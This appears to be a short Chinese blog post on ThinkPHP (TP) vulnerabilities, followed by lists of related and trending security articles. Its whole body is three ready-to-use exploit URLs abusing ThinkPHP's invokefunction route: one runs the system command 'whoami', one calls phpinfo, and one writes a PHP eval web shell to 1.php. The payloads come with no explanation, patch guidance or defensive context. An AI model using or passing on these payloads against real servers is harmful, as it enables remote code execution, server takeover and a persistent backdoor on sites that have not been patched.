Thinkphp(TP)

谪仙1232024-09-24 12:16

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
石像鬼₧魂石1 天前
网络安全渗透测试学习路线的核心技能阶段应该学习哪些知识
学习·安全·web安全
浩浩测试一下1 天前
应急响应 > > > DDoS HTTP 应用层攻击研判溯源手法详解
安全·web安全·网络安全·系统安全·ddos·安全架构
蜡笔小新拯救世界1 天前
简单rce的ctf题目绕过
linux·c++·web安全·c#
爱学习的小牛2 天前
三年网络安全经验,备考OSCP!
安全·web安全·网络安全·渗透测试·offsec·oscp
上海云盾第一敬业销售2 天前
构建坚不可摧的网站安全防护策略
安全·web安全·ddos
醒醒酒2 天前
sqli-labs Less1-4 新手修仙版
数据库·计算机网络·安全·web安全·网络安全·oracle
NaclarbCSDN2 天前
防御型安全(蓝队)入门
安全·web安全
lifeng43213 天前
2、 网络安全基础 -- 传输层详解 -- DDos攻击
网络·安全·web安全
apocalypsx3 天前
CTF自学-SSRF(3)
web安全·网络安全
热门推荐
01GitHub 镜像站点02【网络安全测试】Burp Suite工具使用说明、配置及常见问题(有关必回)03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04Claude Code Skills 实用使用手册05UV安装并设置国内源06struts2 XML外部实体注入漏洞复现(CVE-2025-68493)07Open Code教程(四)| 高级配置与集成08在Trae中使用Pencil MCP09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)10Linux下V2Ray安装配置指南